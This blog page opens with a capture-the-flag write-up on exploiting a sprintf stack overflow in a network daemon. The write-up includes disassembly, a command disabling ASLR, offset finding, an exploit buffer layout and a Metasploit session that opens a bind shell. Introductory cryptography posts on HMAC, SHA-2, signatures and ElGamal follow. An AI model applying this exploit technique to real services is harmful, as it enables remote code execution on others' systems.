Limited Entropy Dot Com Not so random thoughts on security featured by Eloi Sanfèlix


RootedCON CTF write-up ‘hello’ challenge

Posted by Eloi Sanfèlix

As you probably know, last week I was at RootedCON. During the congress, a Capture The Flag contest was organized, in which each participant had to solve several challenges.

Although I didn't register for the contest, I got a copy of one of the binaries from a friend of mine. I'm sorry I was too late for it: if I had been on time he would have won a 1000 euro prize... but I had no time due to my talk. Sorry dude!

However, yesterday morning I had some spare time after the other guys left the hotel and during my flight, so I gave it a try. Yesterday during one of the talks I did a preliminary reverse engineering session with IDA Pro and quickly spotted the flaw: as the hints said, it was a stack buffer overflow caused by sprintf() in the say_something function:

public say_something
say_something proc near
var_118= dword ptr -118h
var_114= dword ptr -114h
var_110= dword ptr -110h
var_106= byte ptr -106h
var_C= dword ptr -0Ch
arg_0= dword ptr  8
push    ebp
mov     ebp, esp
sub     esp, 118h
mov     [esp+118h+var_110], 3E8h
mov     [esp+118h+var_114], 0
mov     [esp+118h+var_118], offset petete
call    _memset
mov     [esp+118h+var_110], 3E8h
mov     [esp+118h+var_114], offset petete
mov     eax, [ebp+arg_0]
mov     [esp+118h+var_118], eax
call    _read
mov     [ebp+var_C], eax
mov     eax, offset aHolaS ; "Hola %s"
mov     [esp+118h+var_110], offset petete
mov     [esp+118h+var_114], eax
lea     eax, [ebp+var_106]
mov     [esp+118h+var_118], eax
call    _sprintf
mov     eax, [ebp+var_C]
add     eax, 5
mov     [esp+118h+var_110], eax
lea     eax, [ebp+var_106]
mov     [esp+118h+var_114], eax
mov     eax, [ebp+arg_0]
mov     [esp+118h+var_118], eax
call    _write
mov     [esp+118h+var_110], 1
mov     [esp+118h+var_114], offset asc_8048F3B ; "\n"
mov     eax, [ebp+arg_0]
mov     [esp+118h+var_118], eax
call    _write
say_something endp

They also provided an address space map from /proc/pid/maps, where one can see that the stack ends at 0xc0000000, which is the default userspace/kernelspace boundary in Linux x86. This means that ASLR is not enabled on the CTF server, so I disabled it on my own machine as well:

# echo 0 > /proc/sys/kernel/randomize_va_space

Then, I tried to exploit it by launching the binary from the shell. However, the binary goes through several steps before it reaches the vulnerable code path. First it is 'daemonized': it forks and the parent process exits while the child process continues in the background. Not too bad, you can just attach to the child process with gdb, but this is not the interesting process yet. After it is daemonized, it does something along the lines of the following C code:

    die("could not drop privs");
if((pw_struct = getpwuid(0x837))==NULL)
    die("Could not get pw entry");

Then the process creates a socket, binds it to TCP port 7878 and listens for incoming connections. Once a connection is received, it forks and serves it in the child process, while the parent process just goes back to the listen loop. This last child process is the one we'd like to analyze, since it is the one calling our vulnerable function.

All this means that we'll need to do one of two things to reach this vulnerable code during our analysis: either we create a user with the uid needed (0x837, i.e. 2103 in decimal), or we patch the program to bypass these calls or to ask for a different uid. I took the first approach.

So what I did was connect with netcat and attach to the last process before sending any data. Then I sent a 300 byte pattern generated with Metasploit's pattern_create.rb:

$ nc localhost 7878
<Attach to process with gdb>

This is what happens in gdb:

Program received signal SIGSEGV, Segmentation fault.
0x41376941 in ?? ()

Great. It seems we control eip, and this definitely looks like part of the Metasploit pattern. Let's find which part it is:

$ ./pattern_offset.rb 41376941 300

All right, we have 261 bytes before we hit eip. This is a weird number, but it's due to the fact that sprintf() puts 5 characters ("Hola ") in front of our input. Now we can use gdb to find where the buffer starts, and we find it at 0xbffff1c2. So this is our current situation: we can enter 261 bytes of data, then we have eip which we control, and then we still have some more room (up to the 1000 bytes read by the daemon from the network).
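To make the 261 figure less magic, here is a small Python sketch of what pattern_offset.rb does, plus a cross-check against the disassembly. The pattern generator is my own re-implementation of the well-known Aa0Aa1Aa2... scheme, not Metasploit's code, and the function names are made up for this example.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic Aa0Aa1Aa2... pattern (re-implementation, not Metasploit's code)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length):
    """Return the offset of the 4 bytes that ended up in eip, or -1 if absent."""
    # x86 is little-endian: eip 0x41376941 was stored as bytes 41 69 37 41.
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)


offset = pattern_offset(0x41376941, 300)

# Cross-check from the listing: sprintf() writes to ebp-0x106, the saved
# return address lives at ebp+4, and "Hola " uses up the first 5 bytes.
frame_offset = 0x106 + 4 - len("Hola ")

print(offset, frame_offset)
```

Both numbers agree, which is a nice sanity check that the crash really is the saved return address of say_something being overwritten.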

So, we'll just fill the buffer with junk, then an address in the middle of our nop sled (such as 0xbffff380), then some nops and then our payload. Since we do not have ASLR or anything, this will just work. We use a nop sled to account for the different environment the CTF server would have: a different list of environment variables will make the stack move slightly up or down.
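The layout described above can be sketched in a few lines of Python. This is only an illustration of the byte layout, not the Metasploit module: the sled length and the placeholder payload (a run of int3 bytes) are my own choices for the example, and I am assuming that 0xbffff1c2 is the address of the sprintf() destination buffer.

```python
import struct

OFFSET_TO_EIP = 261       # bytes of input before the saved return address
RET_ADDR = 0xbffff380     # address from the post, meant to land in the nop sled
BUF_START = 0xbffff1c2    # assumption: start of the sprintf() destination
MAX_INPUT = 1000          # the daemon read()s at most 0x3E8 bytes


def build_input(payload, sled_len=300):
    """junk + return address + nop sled + payload, as described in the text."""
    ret = struct.pack("<I", RET_ADDR)  # little-endian on x86
    data = b"A" * OFFSET_TO_EIP + ret + b"\x90" * sled_len + payload
    if b"\x00" in data:
        # sprintf("%s") stops copying at the first NUL byte
        raise ValueError("input must not contain NUL bytes")
    if len(data) > MAX_INPUT:
        raise ValueError("input longer than what the daemon reads")
    return data


# Placeholder only: int3 instructions instead of real shellcode.
placeholder_payload = b"\xcc" * 32
data = build_input(placeholder_payload)

# Where the sled starts in memory: buffer + "Hola " + junk + saved eip.
sled_start = BUF_START + len("Hola ") + OFFSET_TO_EIP + 4
print(hex(sled_start), RET_ADDR - sled_start)
```

Under that assumption the chosen return address falls a bit less than 200 bytes into the sled, which leaves some slack in both directions if the stack on the target is shifted.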

Now we can make a Metasploit module for it, and just launch it:

msf > use exploit/linux/misc/ctf_rooted 
msf exploit(ctf_rooted) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(ctf_rooted) > set encoder x86/countdown
encoder => x86/countdown
msf exploit(ctf_rooted) > exploit
[*] Started bind handler
[*] Command shell session 1 opened ( ->
uid=1000(eloi) gid=1000(eloi) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(eloi)
Abort session 1? [y/N]  y

The Metasploit module can be found here. You can see that it is a pretty simple module and it works fine on my local machine. Maybe you need to change something on yours (at the very least, disabling randomize_va_space is required) but it should be very similar or identical.

I actually filled the buffer with the return address repeated many times, because the exploit failed when I was not attached with gdb and I wanted to be sure I was overwriting the saved eip. I didn't investigate the reason; I just solved it by putting the ret address where the junk was and making the nop sled slightly bigger than before.

Since it is a remote exploit and the environment may vary greatly from your own machine to the CTF machine, it is possible that some bruteforcing of the return address is needed. Anyway, the daemon stays alive even if your exploit fails, so that should be no problem.

Again, I'm sorry dude that I could not help you in time. Anyway, I'm sure you guys had great fun with it!


RootedCON coming up!

Posted by Eloi Sanfèlix

Yes, it's finally there!

RootedCON will take place the coming week in Madrid, and I'll be there to present together with Javi some stuff about Android on Saturday. You can see our first slide spoiled by Javi on twitter here:

The schedule looks promising and I think we are going to have loads of fun 😀

I'll be there the three days, so if you want to talk to me about anything interesting (info security, side channel analysis, cryptography, whatever...) or have a beer just drop by!

See you there!


Understanding the DNIe, Part I : Device Authentication

Posted by Eloi Sanfèlix

For a long time I wanted to have the opportunity to analyze the Spanish electronic ID, known in Spain as the DNIe. Last Christmas I was finally able to get an appointment with the appropriate police station in Spain and could get my brand new DNIe. Over a few posts I'm going to tell you how I've been trying to understand what the device does without access to any confidential information whatsoever, using information freely available on the Internet and analyzing communication logs between my PC and my DNIe.

The DNIe is a smart card implementing an E-SIGN application. This application is specified by the CWA-14890 documents (where CWA means CEN Workshop Agreement, and CEN means European Committee for Standardization) and provides an interoperable framework for secure signature devices.

These devices are designed to be used for electronic signatures, and in the Spanish case it has replaced the identity document we have used for many years. It is an ISO 7816 compliant smart card, with (afaik) a custom operating system. The IC has received an EAL5+ Common Criteria certificate issued by the French scheme, while the ICC has been certified by the Spanish scheme and has obtained EAL4+.

This is all public documentation you can find on the Internet:

These documents show the Common Criteria certificates for the chip and the card, and the specifications of the protocol followed by the card.

Further, the Spanish Administration provides an OpenSC library in binary form that one can use for communicating with the cards in Linux and Mac OS X. They also provide a CSP for Microsoft Windows. In the remainder of this post I'll explain my attempts at understanding how the device and the protocol work.

Everything has been done with consumer equipment on an Ubuntu 9.10 computer and using public documentation, thus everyone holding an actual DNIe should be able to reproduce these steps. Let's try to understand the details about this thing and how it communicates with our PC. We will start with the Device Authentication phase, which is the first thing that takes place when you use your eID.

Let me remind you once again that I do not have access to any confidential information related to the DNIe, and therefore this is all public information. Also, I've done this analysis in my own free time sitting at home and using publicly available tools and a PCSC reader obtained from Tractis.


Crypto Series – ElGamal Cryptosystem

Posted by Eloi Sanfèlix

In our last post we learnt about the Discrete Logarithm problem, why it is a difficult problem and how we can attempt to solve it if the numbers are manageable. Of course, in a real setting we wouldn't use 16 bit numbers as in my example, but at least 1024 bit numbers nowadays (and most likely even bigger numbers).

Now, we are going to see how to make use of that problem to create a public key cryptosystem. We will look at how ElGamal uses the DL problem to provide public key encryption and digital signatures. Keep on reading if you are interested!


Crypto Series: Discrete Logarithm

Posted by Eloi Sanfèlix

From last post, it becomes clear that at this stage we won't be able to make it without some maths. That's because we are dealing now with public key crypto, which is based on difficult mathematical problems (as in difficult to solve, not as in difficult to understand).

With symmetric crypto, we could understand the concepts of diffusion and confusion without needing to dive into maths. On the other hand, here we will need to understand the problems on which the algorithms rely in order to understand how they work.

In this post, we'll see what the Discrete Logarithm problem is, why it is difficult to solve based on a simple intuition, and finally a method to solve this kind of problem. Of course it's not the only (nor the best) existing method, but in my opinion it is the simplest one to understand.


Welcome to Limited Entropy Dot Com

Posted by Eloi Sanfèlix

Well, not much to say, this blog is just coming to life now. I've imported everything from my previous blog and posted a note there so that current readers can still follow me. The template used is still a default one, but I asked a friend of mine to apply some small personalization to it whenever she has time, so it will change a little in the future.

If you are new here, take a look at the About page to know a little more about the guy writing these lines. I'll continue talking about security, cryptography and all that weird stuff I like starting today. Stay tuned!


Crypto Series: Digital Signatures

Posted by Eloi Sanfèlix

In the previous post, I said I'd write about the Discrete Logarithm problem in the next post. However, I forgot to mention the general idea behind digital signatures. Since I can't sleep right now and have to take a train to the airport in a couple of hours, I decided to go ahead and write a few lines about digital signatures ;-).

Basic idea

The basic idea behind digital signatures is to make use of the fact that in public key cryptography a user has a private key which is never disclosed to anyone in order to authenticate the user or messages generated by that user.

In a symmetric setting, authentication is performed using MAC or HMAC mechanisms, and at least two parties know the key used to generate those messages. Therefore, a given party could deny that he or she generated a given authenticated message, because he is not the only one who knows that key and therefore there is no proof that he did generate the message.

Of course, if only two parties know the key, and one of the parties knows that a particular message was not generated by himself, then it must come from the other party. However, in a legal dispute, there is no way to prove that and to an external observer both of the options are equally likely.

To solve that issue, digital signatures generate a sort of authentication code using a private key, never disclosed to anyone. Then, using the related public key, everyone can verify that signature and therefore be sure that the message came from that user. Since that entity is the only one knowing the private key, this sort of construction can be used to bind a user to a message and resolve any legal disputes that might arise.

Normally, you can see the digital signature generation process as some sort of encryption with a private key. On the other hand, you can imagine the signature verification (or opening) phase as a decryption using the public part of the key.

Practical usage of digital signatures

In the real world, documents are usually way larger than the message length that common digital signature algorithms can handle directly. Since authenticating each chunk of a document is not very practical (asymmetric crypto is usually slooooow), in practice a cryptographic hash is computed over the document, and the hash is signed using the private key and the signature algorithm.

Then, in the verification stage, a second hash is computed and compared against the signed hash. If they match, the signature is correct and therefore the received document was created by the signing party and has not been modified.
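As a rough illustration of this hash-then-sign flow, here is a Python sketch using textbook RSA with a toy key as a stand-in for the signature algorithm. Everything about the key (the classic p=61, q=53 example) and the function names is an assumption made for the example: the modulus is ridiculously small, there is no padding, and the digest is reduced modulo N only so that it fits. Do not read it as how a real signature scheme is implemented.

```python
import hashlib

# Toy RSA key (p=61, q=53). Far too small for any real use.
N = 3233   # public modulus
E = 17     # public exponent
D = 2753   # private exponent, E*D = 1 mod (p-1)(q-1)


def digest_as_int(document):
    """Hash the document; reduce mod N only because the toy modulus is tiny."""
    return int.from_bytes(hashlib.sha256(document).digest(), "big") % N


def sign(document):
    """'Encrypt' the hash with the private key."""
    return pow(digest_as_int(document), D, N)


def verify(document, signature):
    """Recompute the hash and compare it with the 'decrypted' signature."""
    return pow(signature, E, N) == digest_as_int(document)


document = b"I owe Bob 10 euros"
signature = sign(document)
print(verify(document, signature))            # the genuine signature verifies
print(verify(document, (signature + 1) % N))  # a different signature value does not
```

Note how the signer and the verifier both hash the whole document, but only one small number goes through the slow public key operation.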

Of course, this assumes that cryptographic hash functions behave as expected and that collisions cannot be found in practice. Otherwise, if one could find another document which produces the same hash (and thus the same signature), any legal proof that the document was created by the private key holder would be destroyed.

Therefore, choosing secure hash functions for usage within digital signatures is a crucial issue. As an example problem that arose due to the use of insecure hash functions with digital certificates, check the Hashclash project.


Crypto Series: New Directions in Cryptography

Posted by Eloi Sanfèlix

As some of you might have noticed already by looking at the title, this post will be the first one talking about public key cryptography. Today, I'll introduce the basic ideas around public key crypto and the ideas proposed by Diffie and Hellman in their famous paper 'New Directions in Cryptography' from 1976.

In subsequent posts, we will look at the discrete logarithm problem and the factorization problem. We'll also look into some public key cryptosystems, such as ElGamal and RSA. And after that, we'll look at Elliptic Curve Cryptography. With all this, the algorithms part of this series will be considered closed and I'll move into cryptographic systems and protocols ;-). Stay tuned!


Crypto Series: Authentication codes

Posted by Eloi Sanfèlix

This time we'll treat two well known techniques used to solve a common problem in cryptography: authentication. To put it simply, authentication is the process of establishing an identity or a message's origin.

To achieve this using symmetric cryptography, two basic mechanisms exist. The first of them, commonly referred to as Message Authentication Codes (MAC), is based on using block ciphers with a shared key between the party claiming an identity (or sending a message) and the party verifying the identity or the origin of the message.

The second one, known as Hashed Message Authentication Codes (HMAC), is based on the use of a hash function together with some shared key. In the remainder of this post, I briefly describe the basic idea behind these two ways of assuring message authentication.

Message Authentication Codes using block ciphers

A common way to authenticate messages is to use a block cipher, such as DES, in a mode of operation which makes the last encrypted block dependent on both the key and all the previous plaintext blocks. For instance, one can think of using 3DES in CBC mode to create a MAC over a message: encrypt the message in CBC mode using 3DES with the shared key, take the last output block and attach it to your original message.

When the recipient gets the message with its MAC, it performs the same operation: it encrypts the message in CBC mode with the shared key and takes the last block. The result is compared against the MAC attached to the message: if there is a match, the sender of the message must have known the key (unless the encryption used is broken).

Despite being one of the most popular techniques for MAC generation (if not the most popular), CBC-MAC has some security problems and other techniques exist. For instance, you can take a look at Special Publication 800-38B by NIST.
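To show just the chaining structure of the CBC-MAC computation described above, here is a Python sketch. Python's standard library has no DES or 3DES, so I'm plugging in a tiny 4-round Feistel network built on SHA-256 as a stand-in block cipher; that toy cipher, the zero IV, the 0x80-then-zeros padding and all function names are assumptions for the example, and none of it should be taken as a secure or standard-compliant MAC.

```python
import hashlib
import hmac

BLOCK = 8  # block size in bytes, same as DES/3DES


def toy_block_encrypt(key, block):
    """Stand-in for 3DES: a 4-round Feistel network. For illustration only."""
    left, right = block[:4], block[4:]
    for rnd in range(4):
        f = hashlib.sha256(key + bytes([rnd]) + right).digest()[:4]
        left, right = right, bytes(a ^ b for a, b in zip(left, f))
    return left + right


def pad(message):
    """Append 0x80 and then zeros up to a multiple of the block size."""
    padded = message + b"\x80"
    return padded + b"\x00" * (-len(padded) % BLOCK)


def cbc_mac(key, message):
    """Encrypt in CBC mode with a zero IV and keep only the last block."""
    state = bytes(BLOCK)
    data = pad(message)
    for i in range(0, len(data), BLOCK):
        block = data[i:i + BLOCK]
        state = toy_block_encrypt(key, bytes(a ^ b for a, b in zip(state, block)))
    return state


def verify(key, message, tag):
    """The recipient recomputes the MAC and compares it with the received one."""
    return hmac.compare_digest(cbc_mac(key, message), tag)


key = b"shared secret"
tag = cbc_mac(key, b"transfer 10 euros to Bob")
print(tag.hex(), verify(key, b"transfer 10 euros to Bob", tag))
```

Every block is XORed with the previous cipher output before being encrypted, which is what makes the final block depend on the whole message and on the key.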

Hashed Message Authentication Codes

HMAC is a standardized way of using hash functions for authentication purposes. The idea is to incorporate the usage of a key into a hash function, in such a way that the resulting hash could not be produced without knowing the key.

The obvious choices of prefixing the message with the key or appending the key after the message before computing the hash have security problems (see Stop using unsafe keyed hashes, use HMAC by Nate Lawson). Therefore, a slightly more complex structure was invented to avoid such problems.

The HMAC construction is defined as follows:

HMAC(m,K)=H((K \oplus opad)||H((K \oplus ipad)||m))

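Where opad (outer pad) is the byte 0x5c repeated (0x5c...5c) and ipad (inner pad) is the byte 0x36 repeated (0x36...36). Both constants are as long as the hash function's block length, and the key is brought to that same length before the XOR: it is padded with zeros if it is shorter, or hashed first if it is longer.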

With this, one would follow the same approach as with any MAC: compute the HMAC value for the given message, and send it attached to the message. The recipient will perform the same computation, and if it matches the one attached to the message he will conclude that the message was sent by someone who knows K (which is hopefully only the person/entity he shared it with 😉 ).
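The formula translates almost literally into code. Below is a minimal Python sketch that builds HMAC by hand on top of SHA-256 (my choice of hash for the example) and compares the result with Python's own hmac module. The function name hmac_sha256 is made up here; in real code you would simply call the library.

```python
import hashlib
import hmac


def hmac_sha256(key, message):
    """HMAC(m, K) = H((K xor opad) || H((K xor ipad) || m)) with H = SHA-256."""
    block_size = hashlib.sha256().block_size  # 64 bytes for SHA-256
    if len(key) > block_size:
        key = hashlib.sha256(key).digest()    # long keys are hashed first
    key = key.ljust(block_size, b"\x00")      # then padded with zeros
    ipad = bytes(b ^ 0x36 for b in key)
    opad = bytes(b ^ 0x5C for b in key)
    inner = hashlib.sha256(ipad + message).digest()
    return hashlib.sha256(opad + inner).digest()


key = b"shared key"
message = b"hello world"
ours = hmac_sha256(key, message)
reference = hmac.new(key, message, hashlib.sha256).digest()
print(ours.hex())
print(hmac.compare_digest(ours, reference))
```

The recipient would run the same computation over the received message and compare the two values, preferably with a constant-time comparison such as hmac.compare_digest.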

This concludes my introduction to authentication codes. If you are looking for a good security analysis on HMAC functions, wait for Nate's post because I'm sure it will be very interesting.


Crypto Series: Cryptographic hash functions – SHA-2

Posted by Eloi Sanfèlix

So far, we've looked at block and stream ciphers in this series, including examples of each of them. Before going into asymmetric crypto I want to explain a little bit about cryptographic hash functions and some of their applications. We'll look at hash functions in general and at the SHA-2 family of hash functions as an example.

Note that I'll often skip the 'cryptographic' adjective throughout this series of posts, but I'll always refer to cryptographic hash functions and not to regular hash functions. And as usual, this is by no means complete but just tries to give a basic understanding of what hash functions are and what they usually look like.

I must say I never studied hash functions too deeply, so this stuff will serve as a reminder for me as well. If something is not as accurate as you'd hope for, let me know in the comments ;-).

Cryptographic Hash functions: properties

A cryptographic hash function is defined as a series of operations over an input message of arbitrary length, producing an output of fixed length (the hash or message digest) such that a change to the message would not go unnoticed. It should be easy to compute the hash of a message, but given a hash value it should be infeasible to find a message that would produce that value. Further, given a message it should be infeasible to find a second message producing the same message digest and, as I stated before, it should be infeasible to modify a message without modifying its hash value.

Therefore, the desired properties of a cryptographic hash function are as follows:

  • Preimage resistance: given a hash value h, it should be infeasible to find a message m with h=hash(m). Otherwise the function would be vulnerable to preimage attacks.
  • Second preimage resistance: given a message m_1 it should be infeasible to find a second message m_2 which produces the same message digest. I.e., given m_1, it should be difficult to find a different m_2 such that hash(m_1) = hash(m_2). Otherwise, the function is said to be vulnerable to second preimage attacks.
  • Collision resistance: it should be difficult to find two different messages with the same message digest. Obviously, given a hash function with an output size of n bits, if you try 2^{n}+1 different messages, you are guaranteed to get two of them with the same hash. The theory behind birthday attacks tells us that for an n bit hash function we'd only have to try out about 2^{n/2} inputs to find a collision with good probability. That number is called the birthday bound.
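To get a feeling for the birthday bound, one can look for collisions on a deliberately weakened hash. The Python sketch below truncates SHA-256 to 16 bits (my own toy setup, with hypothetical function names) and hashes a simple counter until two inputs collide. For a 16 bit output the birthday bound is around 2^8 = 256 tries, while the pigeonhole argument only guarantees a collision after 2^16 + 1 tries.

```python
import hashlib


def truncated_hash(message, n_bytes=2):
    """SHA-256 cut down to n_bytes, to make collisions easy to find."""
    return hashlib.sha256(message).digest()[:n_bytes]


def find_collision(n_bytes=2):
    """Hash '0', '1', '2', ... until two inputs share a truncated hash."""
    seen = {}
    counter = 0
    while True:
        message = str(counter).encode()
        h = truncated_hash(message, n_bytes)
        if h in seen:
            return seen[h], message, counter + 1
        seen[h] = message
        counter += 1


m1, m2, tries = find_collision()
print(m1, m2, tries)
```

Running it should report a number of tries in the hundreds rather than in the tens of thousands, which is exactly the gap between 2^{n/2} and 2^{n}.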

Typical structure of a hash function

A hash function typically consists of a compression function which takes blocks of a fixed length as input and produces blocks of a fixed length (the output length of the hash function). Additionally, the output of the previous block is fed back to the input so that the next block depends on all the previous blocks. Otherwise, the hash function would be looking at the last block only 😉

Figure: Merkle-Damgård construction

The structure shown is known as the Merkle-Damgård construction, and most popular hash functions are based on this construction. However, alternative structures exist and many of the proposals for the SHA-3 contest are based on different constructions.

The SHA-2 family

Although MD5 and SHA-1 are way more popular, I decided to take a look at the SHA-2 family of hash functions and describe its structure here. The reason for this is that MD5 was broken a while ago, first by Dr. Wang's team and later by a group of researchers including Dr. Benne de Weger. I already talked about it here, although it's only in Spanish. You can see the HashClash project's page if you don't read Spanish ;-).

Further, SHA-1 is very similar to MD5 and the same sort of problems usually apply to it. Therefore, I chose to look at the next family of hash functions, the SHA-2 family. This includes several hash functions with different output lengths: SHA-224, SHA-256, SHA-384, and SHA-512 where the number defines the number of output bits.

SHA-256 and SHA-512 use 32 and 64 bit words respectively, while SHA-224 and SHA-384 are basically truncated versions of them (computed with different initial values). In the remainder of this section I'll explain SHA-256, since SHA-512's structure is basically the same but with a different word size and different initial values.

Basically, the input message is padded with additional information that includes the length of the original message, and is then divided into 512 bit blocks M_i. Then, for each of these blocks a message schedule is run which produces 64 words W_t of 32 bits each.
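The padding and the message schedule are short enough to write down. Here is a Python sketch of both steps for SHA-256, following my reading of the standard; the function names are my own, and this is not a complete hash implementation because the compression function and its constants are left out.

```python
import struct

MASK = 0xFFFFFFFF  # all arithmetic is on 32 bit words


def rotr(x, n):
    """Rotate a 32 bit word right by n bits."""
    return ((x >> n) | (x << (32 - n))) & MASK


def pad(message):
    """Append 0x80, zeros, and the 64 bit big-endian length in bits."""
    bit_len = 8 * len(message)
    padded = message + b"\x80"
    padded += b"\x00" * ((56 - len(padded)) % 64)
    return padded + struct.pack(">Q", bit_len)


def message_schedule(block):
    """Expand one 512 bit block into the 64 words W_t."""
    w = list(struct.unpack(">16I", block))
    for t in range(16, 64):
        s0 = rotr(w[t - 15], 7) ^ rotr(w[t - 15], 18) ^ (w[t - 15] >> 3)
        s1 = rotr(w[t - 2], 17) ^ rotr(w[t - 2], 19) ^ (w[t - 2] >> 10)
        w.append((w[t - 16] + s0 + w[t - 7] + s1) & MASK)
    return w


padded = pad(b"abc")
w = message_schedule(padded[:64])
print(len(padded), hex(w[0]), w[15])
```

For the three byte message "abc" everything fits in a single block: the first word holds the message followed by the 0x80 marker, and the last word of the block holds the length, 24 bits.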

These 64 words are processed with the compression function shown in this picture, where the working variables a..h are initialized according to the standard:

Figure: SHA-2 compression function

After this processing, the intermediate hash value is computed as the word-wise addition (modulo 2^32) of the variables a..h and the previous intermediate hash value. This process is run for each message block and finally yields the message digest.

Of course, this is a very high level description of the algorithm. If you want to know the details, see the FIPS 180-2 standard publication.

The SHA-3 contest

Currently, an open contest is being held by NIST to create a new hashing standard, SHA-3. The contest is in its second round and there are 14 second round candidates. The Second SHA-3 Candidate Conference is planned for August 2010 and the idea is to publish a revised Hash Function Standard by 2012.

More information on the contest and the submissions can be found on the NIST Hash competition website.